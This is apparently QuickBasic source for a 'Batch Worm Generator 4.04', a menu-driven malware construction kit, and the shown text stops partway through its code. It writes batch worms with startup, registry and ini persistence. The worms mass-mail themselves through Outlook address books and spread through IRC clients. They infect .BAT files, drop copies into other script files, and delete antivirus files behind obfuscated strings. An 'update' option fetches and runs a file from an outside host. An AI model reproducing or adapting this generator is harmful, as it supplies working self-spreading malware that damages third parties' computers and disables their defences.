headline:
CLS
REM SeCoNd PaRt To HeLl's
REM BATCH WORM GENERATOR 4.04
name$ = "BATCH WORM GENERATOR 4.04"
RANDOMIZE TIMER
COLOR 1
PRINT "             + + + + + + + + + + + + + + + + + + + + + + + + + + + "
PRINT "             + + + +                                       + + + + "
PRINT "             + + + +      "; name$; "        + + + + "
PRINT "             + + + +                                       + + + + "
PRINT "             + + + + + + + + + + + + + + + + + + + + + + + + + + + "
PRINT ""
COLOR 7
PRINT " WRITE WORM (1)"
PRINT " INFORMATION (2)"
PRINT " THANKS AND GREETS (3)"
PRINT " INTERNET UPDATE (4)"
PRINT " END (5)"
PRINT ""
INPUT " Please choose: ", beginn
IF beginn = 1 THEN GOTO VIRUSERSTELLEN
IF beginn = 2 THEN GOTO INFORMATION
IF beginn = 3 THEN GOTO TAG
IF beginn = 4 THEN GOTO update
IF beginn = 5 THEN GOTO Ende
GOTO headline
INFORMATION:
CLS
COLOR 1
PRINT "             + + + + + + + + + + + + + + + + + + + + + + + + + + + "
PRINT "             + + + +                                       + + + + "
PRINT "             + + + +      "; name$; "        + + + + "
PRINT "             + + + +                                       + + + + "
PRINT "             + + + + + + + + + + + + + + + + + + + + + + + + + + + "
PRINT ""
COLOR 7
PRINT "                     Information about the Batch Worm Generator"
PRINT ""
PRINT " First I have to say, that spreading a computervirus is illegal in most"
PRINT " countries and this program is provided here for educational use only."
PRINT " I will not be held responsible for any damage done to your own "
PRINT " personal machine or 3rd party. "
PRINT ""
COLOR 2
PRINT " Now something else:"
COLOR 7
PRINT " I haven't built any harmful functions in this program, because I don't want to"
PRINT " encourage destructive payloads, viruswriters should be creative at this point ..."
PRINT ""
INPUT " press enter...", nix$
CLS
COLOR 1
PRINT "             + + + + + + + + + + + + + + + + + + + + + + + + + + + "
PRINT "             + + + +                                       + + + + "
PRINT "             + + + +      "; name$; "        + + + + "
PRINT "             + + + +                                       + + + + "
PRINT "             + + + + + + + + + + + + + + + + + + + + + + + + + + + "
PRINT ""
COLOR 7
PRINT " IMPORTANT: If the program causes any problems, "
PRINT " or the program made a buggy worm, or if you have any suggestion"
PRINT " to improve this program, please write me a mail to:"
COLOR 2
PRINT " SPTH@jet2web.cc"
COLOR 7
PRINT ""
PRINT " I try to fix the bugs as fast as i can, and upload the program to this site:"
COLOR 2
PRINT " http://www.spth.de.vu"
COLOR 7
PRINT ""
PRINT " greets,"
PRINT ""
PRINT " SeCoNd PaRt To HeLl"
PRINT ""
INPUT " press enter...", nix$
GOTO headline
update:
CLS
COLOR 1
PRINT "             + + + + + + + + + + + + + + + + + + + + + + + + + + + "
PRINT "             + + + +                                       + + + + "
PRINT "             + + + +      "; name$; "        + + + + "
PRINT "             + + + +                                       + + + + "
PRINT "             + + + + + + + + + + + + + + + + + + + + + + + + + + + "
PRINT ""
COLOR 4
PRINT " INTERNET UPDATE:"
COLOR 7
PRINT ""
INPUT " Press ENTER for upgrading to a new version of BWG... ", nix$
OPEN "update.vbs" FOR OUTPUT AS #2
PRINT #2, "CreateObject("; CHR$(34); "WScript.Shell"; CHR$(34); ").run "; CHR$(34); "http://www26.brinkster.com/geld4u/newver.zip"; CHR$(34); ",3,false"
CLOSE #2
SHELL "cscript update.vbs"
CLS
COLOR 1
PRINT "             + + + + + + + + + + + + + + + + + + + + + + + + + + + "
PRINT "             + + + +                                       + + + + "
PRINT "             + + + +      "; name$; "        + + + + "
PRINT "             + + + +                                       + + + + "
PRINT "             + + + + + + + + + + + + + + + + + + + + + + + + + + + "
PRINT ""
COLOR 4
PRINT " INTERNET UPDATE:"
COLOR 7
PRINT ""
PRINT " The new program was downloaded."
PRINT " Extract the file newver.zip and you can use a new version of BWG."
INPUT " press ENTER...", nix$
KILL "update.vbs"
GOTO headline
TAG:
CLS
COLOR 1
PRINT "             + + + + + + + + + + + + + + + + + + + + + + + + + + + "
PRINT "             + + + +                                       + + + + "
PRINT "             + + + +      "; name$; "        + + + + "
PRINT "             + + + +                                       + + + + "
PRINT "             + + + + + + + + + + + + + + + + + + + + + + + + + + + "
PRINT ""
COLOR 4
PRINT " Thanks:"
COLOR 7
PRINT
PRINT " SnakeByte ->> for his QuickBasic-Help [http://www.kryptocrew.de/snakebyte]"
PRINT " VorteX    ->> for his nice suggestions to improve the BWG and Batch virii!"
PRINT " Worf      ->> for his Batch virii, PHP virii and REG virii"
PRINT " Positron  ->> for his Batch virii and BWG help!"
PRINT " Black Cat ->> Put the BWG at his HomePage [http://hvx.cjb.net]"
PRINT " Mr. T     ->> Upload the BWG at his HomePage [http://www.ebcvg.com]"
INPUT " press enter... ", nix$
GOTO headline


PRINT ""
VIRUSERSTELLEN:
CLS
COLOR 1
PRINT "             + + + + + + + + + + + + + + + + + + + + + + + + + + + "
PRINT "             + + + +                                       + + + + "
PRINT "             + + + +      "; name$; "        + + + + "
PRINT "             + + + +                                       + + + + "
PRINT "             + + + + + + + + + + + + + + + + + + + + + + + + + + + "
PRINT ""
COLOR 7
INPUT " Name of the worm: ", virname$
INPUT " Name of the Author: ", virautor$
IF virautor$ = "SPTH" THEN GOTO SPTHVir
IF virautor$ = "spth" THEN GOTO SPTHVir
IF virautor$ = "SeCoNd PaRt To HeLl" THEN GOTO SPTHVir
GOTO SPTHVirEnd
SPTHVir:
COLOR 5
PRINT " Are you crazy??"
COLOR 7
SPTHVirEnd:
INPUT " The main-filename of the virus (file.BAT): ", MyS$
CLS
COLOR 1
PRINT "             + + + + + + + + + + + + + + + + + + + + + + + + + + + "
PRINT "             + + + +                                       + + + + "
PRINT "             + + + +      "; name$; "        + + + + "
PRINT "             + + + +                                       + + + + "
PRINT "             + + + + + + + + + + + + + + + + + + + + + + + + + + + "
PRINT ""
COLOR 4
PRINT " Activation of the worm:"
COLOR 7
DeuAutoSt = 0
INPUT " Shall the worm copy to the german start-upfolder (Y/N): ", akt$
IF akt$ = "Y" THEN DeuAutoSt = 1
IF akt$ = "y" THEN DeuAutoSt = 1
EngAutoSt = 0
INPUT " Shall the worm copy to the english start-upfolder (Y/N): ", eas$
IF eas$ = "Y" THEN EngAutoSt = 1
IF eas$ = "y" THEN EngAutoSt = 1
WinINI = 0
INPUT " Shall the worm activate itself with the win.ini (Y/N): ", wini$
IF wini$ = "Y" THEN WinINI = 1
IF wini$ = "y" THEN WinINI = 1
SysINI = 0
INPUT " Shall the worm activate itself with the system.ini (Y/N): ", ssini$
IF ssini$ = "Y" THEN SysINI = 1
IF ssini$ = "y" THEN SysINI = 1
regkey = 0
INPUT " Shall the worm write itself to a registry key (Y/N): ", rek$
IF rek$ = "Y" THEN regkey = 1
IF rek$ = "y" THEN regkey = 1
CLS
COLOR 1
PRINT "             + + + + + + + + + + + + + + + + + + + + + + + + + + + "
PRINT "             + + + +                                       + + + + "
PRINT "             + + + +      "; name$; "        + + + + "
PRINT "             + + + +                                       + + + + "
PRINT "             + + + + + + + + + + + + + + + + + + + + + + + + + + + "
PRINT ""
COLOR 7
COLOR 4
PRINT " Internet Spreading:"
COLOR 7
Outlook = 0
INPUT " Shall the worm spread with MS-Outlook (Y/N): ", msol$
IF msol$ = "Y" THEN Outlook = 1
IF msol$ = "y" THEN Outlook = 1
IF Outlook = 1 THEN GOTO AuswahlOL
GOTO AuswahlOLEnd
AuswahlOL:
INPUT " --> Which subject: ", OLSubject$
INPUT " --> Which body: ", OLBody$
INPUT " --> Which attachment (pics.BAT): ", OLAttachment$
AuswahlOLEnd:
mIRC = 0
INPUT " Shall the worm spread with mIRC (Y/N): ", IRC$
IF IRC$ = "Y" THEN mIRC = 1
IF IRC$ = "y" THEN mIRC = 1
IF mIRC = 1 THEN GOTO AuswahlmIRC
GOTO AuswahlmIRCEnd
AuswahlmIRC:
INPUT " --> Which filename (funny.jpg.BAT): ", mIRCAttachment$
AuswahlmIRCEnd:
pirchb = 0
INPUT " Shall the worm spread with pIRCh (Y/N): ", pircha$
IF pircha$ = "Y" THEN pirchb = 1
IF pircha$ = "y" THEN pirchb = 1
IF pirchb = 0 THEN GOTO AuswahlpIRChEnd
AuswahlpIRCh:
INPUT " --> Which name of the file (lala.arv.BAT): ", pIRChAttachment$
AuswahlpIRChEnd:
vircB = 0
INPUT " Shall the worm spread with Virc (Y/N): ", virca$
IF virca$ = "Y" THEN vircB = 1
IF virca$ = "y" THEN vircB = 1
IF vircB = 0 THEN GOTO AuswahlVircEnd
AuswahlVirc:
INPUT " --> Which name of the file (love-me.bat): ", vircattachment$
AuswahlVircEnd:

CLS
COLOR 1
PRINT "             + + + + + + + + + + + + + + + + + + + + + + + + + + + "
PRINT "             + + + +                                       + + + + "
PRINT "             + + + +      "; name$; "        + + + + "
PRINT "             + + + +                                       + + + + "
PRINT "             + + + + + + + + + + + + + + + + + + + + + + + + + + + "
PRINT ""
 
COLOR 4
PRINT " Spreading inside a PC:"
COLOR 7
BatInfektionen:
INPUT " Shall the worm infect all .BAT files (Y/N): ", BIF$
BatDateienInf = 0
IF BIF$ = "Y" THEN BatDateienInf = 1
IF BIF$ = "y" THEN BatDateienInf = 1
BatInfektionenEnd:
INPUT " Shall the worm infect Windows-root (Y/N): ", WD$
windir = 0
IF WD$ = "Y" THEN windir = 1
IF WD$ = "y" THEN windir = 1
INPUT " Shall the worm copy onto the Desktop (Y/N): ", desk$
Desktop = 0
IF desk$ = "Y" THEN Desktop = 1
IF desk$ = "y" THEN Desktop = 1
INPUT " Shall the worm copy to a Disk (Y/N): ", Adisk$
Diskette = 0
IF Adisk$ = "Y" THEN Diskette = 1
IF Adisk$ = "y" THEN Diskette = 1
CLS
COLOR 1
PRINT "             + + + + + + + + + + + + + + + + + + + + + + + + + + + "
PRINT "             + + + +                                       + + + + "
PRINT "             + + + +      "; name$; "        + + + + "
PRINT "             + + + +                                       + + + + "
PRINT "             + + + + + + + + + + + + + + + + + + + + + + + + + + + "
PRINT ""
COLOR 4
PRINT " File dropping:"
COLOR 7
RegFileI = 0
INPUT " Shall the worm drop to REG files (Y/N): ", RegFileInfection$
IF RegFileInfection$ = "Y" THEN RegFileI = 1
IF RegFileInfection$ = "y" THEN RegFileI = 1
VBSFileI = 0
INPUT " Shall the worm drop to VBS files (Y/N): ", VBSFileInfection$
IF VBSFileInfection$ = "Y" THEN VBSFileI = 1
IF VBSFileInfection$ = "y" THEN VBSFileI = 1
PifFileI = 0
INPUT " Shall the worm drop to PIF files (Y/N): ", PIFFileInfection$
IF PIFFileInfection$ = "Y" THEN PifFileI = 1
IF PIFFileInfection$ = "y" THEN PifFileI = 1
LnkFileI = 0
INPUT " Shall the worm drop to LNK files (Y/N): ", LnkFileInfection$
IF LnkFileInfection$ = "Y" THEN LnkFileI = 1
IF LnkFileInfection$ = "y" THEN LnkFileI = 1
CLS
COLOR 1
PRINT "             + + + + + + + + + + + + + + + + + + + + + + + + + + + "
PRINT "             + + + +                                       + + + + "
PRINT "             + + + +      "; name$; "        + + + + "
PRINT "             + + + +                                       + + + + "
PRINT "             + + + + + + + + + + + + + + + + + + + + + + + + + + + "
PRINT ""
COLOR 7
COLOR 4
PRINT " Anti AV Techniques:"
COLOR 7
fakeline = 1
INPUT " Shall the worm include much FAKE-LINES in the beginning of the code (Y/N): ", fakelinesa$
IF fakelinesa$ = "Y" THEN fakeline = 1
IF fakelinesa$ = "y" THEN fakeline = 1
CLS
COLOR 1
PRINT "             + + + + + + + + + + + + + + + + + + + + + + + + + + + "
PRINT "             + + + +                                       + + + + "
PRINT "             + + + +      "; name$; "        + + + + "
PRINT "             + + + +                                       + + + + "
PRINT "             + + + + + + + + + + + + + + + + + + + + + + + + + + + "
PRINT ""
COLOR 4
PRINT " Others:"
COLOR 7
INPUT " Shall the Worm write a message (Y/N): ", massag$
mesg = 0
IF massag$ = "Y" THEN mesg = 1
IF massag$ = "y" THEN mesg = 1
IF mesg = 1 THEN GOTO Wmsg
GOTO WmsgEnd
Wmsg:
INPUT " --> Which message: ", msg$
WmsgEnd:
INPUT " Shall the Worm delete some AV programs (Y/N): ", Dav$
delAV = 0
IF Dav$ = "Y" THEN delAV = 1
IF Dav$ = "y" THEN delAV = 1
INPUT " Shall the worm create a logic hard drive (Y/N): ", ll$
LogLauf = 0
IF ll$ = "Y" THEN LogLauf = 1
IF ll$ = "y" THEN LogLauf = 1
INPUT " Shall the worm include the EICAR-VIRUS-TEST-FILE (Y/N): ", eiTF$
EICAR = 0
IF eiTF$ = "Y" THEN EICAR = 1
IF eiTF$ = "y" THEN EICAR = 1
INPUT " press enter... ", a
MakeWorm:
CLS
COLOR 1
PRINT "             + + + + + + + + + + + + + + + + + + + + + + + + + + + "
PRINT "             + + + +                                       + + + + "
PRINT "             + + + +      "; name$; "        + + + + "
PRINT "             + + + +                                       + + + + "
PRINT "             + + + + + + + + + + + + + + + + + + + + + + + + + + + "
PRINT ""
COLOR 7
OPEN "worm.bat" FOR OUTPUT AS #1
IF EICAR = 1 THEN GOTO EICARIN
GOTO EICARINE
EICARIN:
PRINT #1, "X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* % AAAA %"
PRINT #1, "cls % AAAA %"
EICARINE:
PRINT #1, "@echo off % AAAA %"
PRINT #1, "REM Name: "; virname$; " % AAAA %"
PRINT #1, "REM Author: "; virautor$; " % AAAA %"
PRINT #1, "REM generated with "; name$; " % AAAA %"
PRINT #1, "ctty nul % AAAA %"
IF fakeline = 1 THEN GOTO FakeLineB
GOTO FakeLineBEnd
FakeLineB:
FLD = 0
FLDA:
FLC = 0
DO WHILE FLC <= 100
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
b$ = b$ + a$
FLC = FLC + 1
LOOP
FLC = 0
b$ = b$ + " % AAAA %"
PRINT #1, ""; b$
b$ = ""
FLD = FLD + 1
IF FLD <= 10 THEN GOTO FLDA
FakeLineBEnd:
IF delAV = 1 THEN GOTO AVD
GOTO AVDEnd
AVD:
rand = INT(RND * 3) + 1
IF rand = 1 THEN PRINT #1, "% AAAA % set avA=p"
IF rand = 1 THEN delavA$ = "%avA%ro"
IF rand = 2 THEN PRINT #1, "% AAAA % set avA=r"
IF rand = 2 THEN delavA$ = "p%avA%o"
IF rand = 3 THEN PRINT #1, "% AAAA % set avA=o"
IF rand = 3 THEN delavA$ = "pr%avA%"
rand = INT(RND * 3) + 1
IF rand = 1 THEN PRINT #1, "% AAAA % set avB=g"
IF rand = 1 THEN delavB$ = "%avB%ra"
IF rand = 2 THEN PRINT #1, "% AAAA % set avB=r"
IF rand = 2 THEN delavB$ = "g%avB%a"
IF rand = 3 THEN PRINT #1, "% AAAA % set avB=a"
IF rand = 3 THEN delavB$ = "gr%avB%"
delAV$ = delavA$ + delavB$
PRINT #1, "del C:\"; delAV$; "~1\kasper~1\avp32.exe"; " % AAAA %"
rand = INT(RND * 3) + 1
IF rand = 1 THEN PRINT #1, "% AAAA % set avA=p"
IF rand = 1 THEN delavA$ = "%avA%ro"
IF rand = 2 THEN PRINT #1, "% AAAA % set avA=r"
IF rand = 2 THEN delavA$ = "p%avA%o"
IF rand = 3 THEN PRINT #1, "% AAAA % set avA=o"
IF rand = 3 THEN delavA$ = "pr%avA%"
rand = INT(RND * 3) + 1
IF rand = 1 THEN PRINT #1, "% AAAA % set avB=g"
IF rand = 1 THEN delavB$ = "%avB%ra"
IF rand = 2 THEN PRINT #1, "% AAAA % set avB=r"
IF rand = 2 THEN delavB$ = "g%avB%a"
IF rand = 3 THEN PRINT #1, "% AAAA % set avB=a"
IF rand = 3 THEN delavB$ = "gr%avB%"
delAV$ = delavA$ + delavB$
PRINT #1, "del C:\"; delAV$; "~1\norton~1\*.exe"; " % AAAA %"
rand = INT(RND * 3) + 1
IF rand = 1 THEN PRINT #1, "% AAAA % set avA=p"
IF rand = 1 THEN delavA$ = "%avA%ro"
IF rand = 2 THEN PRINT #1, "% AAAA % set avA=r"
IF rand = 2 THEN delavA$ = "p%avA%o"
IF rand = 3 THEN PRINT #1, "% AAAA % set avA=o"
IF rand = 3 THEN delavA$ = "pr%avA%"
rand = INT(RND * 3) + 1
IF rand = 1 THEN PRINT #1, "% AAAA % set avB=g"
IF rand = 1 THEN delavB$ = "%avB%ra"
IF rand = 2 THEN PRINT #1, "% AAAA % set avB=r"
IF rand = 2 THEN delavB$ = "g%avB%a"
IF rand = 3 THEN PRINT #1, "% AAAA % set avB=a"
IF rand = 3 THEN delavB$ = "gr%avB%"
delAV$ = delavA$ + delavB$
PRINT #1, "del C:\"; delAV$; "~1\trojan~1\tc.exe"; " % AAAA %"
rand = INT(RND * 3) + 1
IF rand = 1 THEN PRINT #1, "% AAAA % set avA=p"
IF rand = 1 THEN delavA$ = "%avA%ro"
IF rand = 2 THEN PRINT #1, "% AAAA % set avA=r"
IF rand = 2 THEN delavA$ = "p%avA%o"
IF rand = 3 THEN PRINT #1, "% AAAA % set avA=o"
IF rand = 3 THEN delavA$ = "pr%avA%"
rand = INT(RND * 3) + 1
IF rand = 1 THEN PRINT #1, "% AAAA % set avB=g"
IF rand = 1 THEN delavB$ = "%avB%ra"
IF rand = 2 THEN PRINT #1, "% AAAA % set avB=r"
IF rand = 2 THEN delavB$ = "g%avB%a"
IF rand = 3 THEN PRINT #1, "% AAAA % set avB=a"
IF rand = 3 THEN delavB$ = "gr%avB%"
delAV$ = delavA$ + delavB$ + "~1"
PRINT #1, "del C:\"; delAV$; "\norton~1\s32integ.dll"; " % AAAA %"
rand = INT(RND * 3) + 1
IF rand = 1 THEN PRINT #1, "% AAAA % set avA=p"
IF rand = 1 THEN delavA$ = "%avA%ro"
IF rand = 2 THEN PRINT #1, "% AAAA % set avA=r"
IF rand = 2 THEN delavA$ = "p%avA%o"
IF rand = 3 THEN PRINT #1, "% AAAA % set avA=o"
IF rand = 3 THEN delavA$ = "pr%avA%"
rand = INT(RND * 3) + 1
IF rand = 1 THEN PRINT #1, "% AAAA % set avB=g"
IF rand = 1 THEN delavB$ = "%avB%ra"
IF rand = 2 THEN PRINT #1, "% AAAA % set avB=r"
IF rand = 2 THEN delavB$ = "g%avB%a"
IF rand = 3 THEN PRINT #1, "% AAAA % set avB=a"
IF rand = 3 THEN delavB$ = "gr%avB%"
delAV$ = delavA$ + delavB$
PRINT #1, "del C:\"; delAV$; "\f-prot95\fpwm32.dll"; " % AAAA %"
rand = INT(RND * 3) + 1
IF rand = 1 THEN PRINT #1, "% AAAA % set avA=p"
IF rand = 1 THEN delavA$ = "%avA%ro"
IF rand = 2 THEN PRINT #1, "% AAAA % set avA=r"
IF rand = 2 THEN delavA$ = "p%avA%o"
IF rand = 3 THEN PRINT #1, "% AAAA % set avA=o"
IF rand = 3 THEN delavA$ = "pr%avA%"
rand = INT(RND * 3) + 1
IF rand = 1 THEN PRINT #1, "% AAAA % set avB=g"
IF rand = 1 THEN delavB$ = "%avB%ra"
IF rand = 2 THEN PRINT #1, "% AAAA % set avB=r"
IF rand = 2 THEN delavB$ = "g%avB%a"
IF rand = 3 THEN PRINT #1, "% AAAA % set avB=a"
IF rand = 3 THEN delavB$ = "gr%avB%"
delAV$ = delavA$ + delavB$
PRINT #1, "del C:\"; delAV$; "~1\mcafee\scan.dat"; " % AAAA %"
rand = INT(RND * 3) + 1
IF rand = 1 THEN PRINT #1, "% AAAA % set avA=p"
IF rand = 1 THEN delavA$ = "%avA%ro"
IF rand = 2 THEN PRINT #1, "% AAAA % set avA=r"
IF rand = 2 THEN delavA$ = "p%avA%o"
IF rand = 3 THEN PRINT #1, "% AAAA % set avA=o"
IF rand = 3 THEN delavA$ = "pr%avA%"
rand = INT(RND * 3) + 1
IF rand = 1 THEN PRINT #1, "% AAAA % set avB=g"
IF rand = 1 THEN delavB$ = "%avB%ra"
IF rand = 2 THEN PRINT #1, "% AAAA % set avB=r"
IF rand = 2 THEN delavB$ = "g%avB%a"
IF rand = 3 THEN PRINT #1, "% AAAA % set avB=a"
IF rand = 3 THEN delavB$ = "gr%avB%"
delAV$ = delavA$ + delavB$
PRINT #1, "del C:\"; delAV$; "~1\tbav\tbav.dat"; " % AAAA %"
rand = INT(RND * 3) + 1
IF rand = 1 THEN PRINT #1, "% AAAA % set avA=p"
IF rand = 1 THEN delavA$ = "%avA%ro"
IF rand = 2 THEN PRINT #1, "% AAAA % set avA=r"
IF rand = 2 THEN delavA$ = "p%avA%o"
IF rand = 3 THEN PRINT #1, "% AAAA % set avA=o"
IF rand = 3 THEN delavA$ = "pr%avA%"
rand = INT(RND * 3) + 1
IF rand = 1 THEN PRINT #1, "% AAAA % set avB=g"
IF rand = 1 THEN delavB$ = "%avB%ra"
IF rand = 2 THEN PRINT #1, "% AAAA % set avB=r"
IF rand = 2 THEN delavB$ = "g%avB%a"
IF rand = 3 THEN PRINT #1, "% AAAA % set avB=a"
IF rand = 3 THEN delavB$ = "gr%avB%"
delAV$ = delavA$ + delavB$
PRINT #1, "del C:\"; delAV$; "~1\avpersonal\antivir.vdf"; " % AAAA %"
rand = INT(RND * 3) + 1
IF rand = 1 THEN PRINT #1, "% AAAA % set avA=t"
IF rand = 1 THEN delavA$ = "%avA%ba"
IF rand = 2 THEN PRINT #1, "% AAAA % set avA=b"
IF rand = 2 THEN delavA$ = "t%avA%a"
IF rand = 3 THEN PRINT #1, "% AAAA % set avA=a"
IF rand = 3 THEN delavA$ = "tb%avA%"
rand = INT(RND * 2) + 1
IF rand = 1 THEN PRINT #1, "% AAAA % set avB=v"
IF rand = 1 THEN delavB$ = "%avB%w"
IF rand = 2 THEN PRINT #1, "% AAAA % set avB=w"
IF rand = 2 THEN delavB$ = "v%avB%"
delAV$ = delavA$ + delavB$ + "95"
PRINT #1, "del C:\"; delAV$; "\tbscan.sig"; " % AAAA %"
AVDEnd:
PRINT #1, "set MyS=%0 % AAAA %"
PRINT #1, "copy %MyS% "; MyS$; " % AAAA %"
PRINT #1, "set MyS="; MyS$; " % AAAA %"
CLOSE #1
SHELL "poly.exe"
OPEN "worm.bat" FOR APPEND AS #1
PRINT #1, "copy my.bat "; MyS$; " % AAAA %"
PRINT #1, "del my.bat % AAAA %"
IF Outlook = 1 THEN GOTO ol
GOTO OLend
ol:
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
ran = INT(RND * 26) + 97
c$ = CHR$(ran)
ran = INT(RND * 26) + 97
d$ = CHR$(ran)
ran = INT(RND * 26) + 97
e$ = CHR$(ran)
fina$ = a$ + b$ + c$ + d$ + e$ + ".vbs"
PRINT #1, "copy "; MyS$; " C:\"; OLAttachment$; " % CCCC % "
PRINT #1, "copy "; MyS$; " C:\"; fina$; " % CCCC % "
vbswayp = INT(RND * 1) + 1
IF vbswayp = 1 THEN GOTO VBSwaya
IF vbswayp = 2 THEN GOTO vbswayb
VBSwaya:
mp = INT(RND * 2) + 1
IF mp = 1 THEN PRINT #1, "echo Dim x > C:\"; fina$; " % CCCC % "
IF mp = 2 THEN PRINT #1, "% CCCC %set VBSwayF=dim"
IF mp = 2 THEN PRINT #1, "echo %VBSwayF% x > C:\"; fina$; " % CCCC % "
IF mp = 2 THEN PRINT #1, "% CCCC %set VBSwayF="
mp = INT(RND * 2) + 1
IF mp = 1 THEN PRINT #1, "echo.on error resume next >> C:\"; fina$; " % CCCC % "
IF mp = 2 THEN PRINT #1, "% CCCC %set VBSwayA=resume"
IF mp = 2 THEN PRINT #1, "echo.on error %VBSwayA% next >> C:\"; fina$; " % CCCC % "
IF mp = 2 THEN PRINT #1, "% CCCC %set VBSwayA="
mp = INT(RND * 2) + 1
IF mp = 1 THEN PRINT #1, "echo Set fso ="; CHR$(34); " Scripting.FileSystem.Object"; CHR$(34); " >> C:\"; fina$; " % CCCC % "
IF mp = 2 THEN PRINT #1, "% CCCC %set VBSwayG=FileSystem"
IF mp = 2 THEN PRINT #1, "echo Set fso ="; CHR$(34); " Scripting.%VBSwayG%.Object"; CHR$(34); " >> C:\"; fina$; " % CCCC % "
IF mp = 2 THEN PRINT #1, "% CCCC %set VBSwayG="
mp = INT(RND * 1) + 1
rand = INT(RND * 3) + 1
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
fsore$ = a$ + b$
PRINT #1, "set vbsosf="; fsore$; " % CCCC % "
IF rand = 1 THEN PRINT #1, "% CCCC % set vbsosf=f"
IF rand = 1 THEN fso$ = "%vbsosf%so"
IF rand = 2 THEN PRINT #1, "% CCCC % set vbsosf=s"
IF rand = 2 THEN fso$ = "f%vbsosf%o"
IF rand = 3 THEN PRINT #1, "% CCCC % set vbsosf=o"
IF rand = 3 THEN fso$ = "fs%vbsosf%"
IF mp = 1 THEN PRINT #1, "echo Set so=CreateObject("; fso$; ") >> C:\"; fina$; " % CCCC % "
PRINT #1, "% CCCC %set vbsosf="
mp = INT(RND * 2) + 1
IF mp = 1 THEN PRINT #1, "echo Set ol=CreateObject("; CHR$(34); "Outlook.Application"; CHR$(34); ") >> C:\"; fina$; " % CCCC % "
IF mp = 2 THEN PRINT #1, "% CCCC %set VBSwayI=Outlook"
IF mp = 2 THEN PRINT #1, "echo Set ol=CreateObject("; CHR$(34); "%VBSwayI%.Application"; CHR$(34); ") >> C:\"; fina$; " % CCCC % "
IF mp = 2 THEN PRINT #1, "% CCCC %set VBSwayI="
mp = INT(RND * 2) + 1
IF mp = 1 THEN PRINT #1, "echo Set out= WScript.CreateObject("; CHR$(34); "Outlook.Application"; CHR$(34); ") >> C:\"; fina$; " % CCCC % "
IF mp = 2 THEN PRINT #1, "% CCCC %set VBSwayJ=WScript"
IF mp = 2 THEN PRINT #1, "echo Set out=%VBSwayJ%.CreateObject("; CHR$(34); "Outlook.Application"; CHR$(34); ") >> C:\"; fina$; " % CCCC % "
IF mp = 2 THEN PRINT #1, "% CCCC %set VBSwayJ="
mp = INT(RND * 2) + 1
IF mp = 1 THEN PRINT #1, "echo Set mapi = out.GetNameSpace("; CHR$(34); "MAPI"; CHR$(34); ") >> C:\"; fina$; " % CCCC % "
IF mp = 2 THEN PRINT #1, "% CCCC % set VBSwayD=out"
IF mp = 2 THEN PRINT #1, "echo Set mapi = %VBSwayD%.GetNameSpace("; CHR$(34); "MAPI"; CHR$(34); ") >> C:\"; fina$; " % CCCC % "
IF mp = 2 THEN PRINT #1, "% CCCC %set VBSwayD="
mp = INT(RND * 2) + 1
IF mp = 1 THEN PRINT #1, "echo Set a = mapi.AddressLists(1) >> C:\"; fina$; " % CCCC % "
IF mp = 2 THEN PRINT #1, "% CCCC % set VBSwayN=Lists"
IF mp = 2 THEN PRINT #1, "echo Set a = mapi.Address%VBSwayN%(1) >> C:\"; fina$; " % CCCC % "
IF mp = 2 THEN PRINT #1, "% CCCC %set VBSwayN="
PRINT #1, "echo Set ae=a.AddressEntries >> C:\"; fina$; " % CCCC % "
mp = INT(RND * 2) + 1
IF mp = 1 THEN PRINT #1, "echo For x=1 To ae.Count >> C:\"; fina$; " % CCCC % "
IF mp = 2 THEN PRINT #1, "% CCCC %set VBSwayB=Count"
IF mp = 2 THEN PRINT #1, "echo For x=1 To ae.%VBSwayB% >> C:\"; fina$; " % CCCC % "
IF mp = 2 THEN PRINT #1, "% CCCC %set VBSwayB="
mp = INT(RND * 2) + 1
IF mp = 1 THEN PRINT #1, "echo Set Mail=ol.CreateItem(0) >> C:\"; fina$; " % CCCC % "
IF mp = 2 THEN PRINT #1, "echo Set ci=ol.CreateItem(0) >> C:\"; fina$; " % CCCC % "
IF mp = 2 THEN PRINT #1, "echo Set Mail=ci >> C:\"; fina$; " % CCCC % "
mp = INT(RND * 2) + 1
IF mp = 1 THEN PRINT #1, "echo Mail.to=ol.GetNameSpace("; CHR$(34); "MAPI"; CHR$(34); ").AddressLists(1).AddressEntries(x) >> C:\"; fina$; " % CCCC % "
IF mp = 2 THEN PRINT #1, "% CCCC % set VBSwayC=Name"
IF mp = 2 THEN PRINT #1, "echo Mail.to=ol.Get%VBSwayC%Space("; CHR$(34); "MAPI"; CHR$(34); ").AddressLists(1).AddressEntries(x) >> C:\"; fina$; " % CCCC % "
IF mp = 2 THEN PRINT #1, "% CCCC %set VBSwayC="
mp = INT(RND * 2) + 1
IF mp = 1 THEN PRINT #1, "echo Mail.Subject="; CHR$(34); OLSubject$; CHR$(34); " >> C:\"; fina$; " % CCCC % "
IF mp = 2 THEN PRINT #1, "% CCCC % set VBSwayK=Mail"; " % CCCC % "
IF mp = 2 THEN PRINT #1, "echo %VBSwayK%.Subject="; CHR$(34); OLSubject$; CHR$(34); " >> C:\"; fina$; " % CCCC % "
IF mp = 2 THEN PRINT #1, "% CCCC % set VBSwayK="
mp = INT(RND * 2) + 1
IF mp = 1 THEN PRINT #1, "echo Mail.Body="; CHR$(34); OLBody$; CHR$(34); " >> C:\"; fina$; " % CCCC % "
IF mp = 2 THEN PRINT #1, "% CCCC % set VBSwayL=Body"; " % CCCC % "
IF mp = 2 THEN PRINT #1, "echo Mail.%VBSwayL%="; CHR$(34); OLBody$; CHR$(34); " >> C:\"; fina$; " % CCCC % "
IF mp = 2 THEN PRINT #1, "% CCCC % set VBSwayL="
mp = INT(RND * 2) + 1
rand = INT(RND * 4) + 1
IF rand = 1 THEN PRINT #1, "% CCCC %set sendB=M"
IF rand = 1 THEN mail$ = "%sendB%ail"
IF rand = 2 THEN PRINT #1, "% CCCC % set sendB=a"
IF rand = 2 THEN mail$ = "M%sendB%il"
IF rand = 3 THEN PRINT #1, "% CCCC % set sendB=i"
IF rand = 3 THEN mail$ = "Ma%sendB%l"
IF rand = 4 THEN PRINT #1, "% CCCC % set sendB=l"
IF rand = 4 THEN mail$ = "Mai%sendB%"
rand = INT(RND * 3) + 1
IF rand = 1 THEN PRINT #1, "% CCCC % set attA=A"
IF rand = 1 THEN attA$ = "%attA%tt"
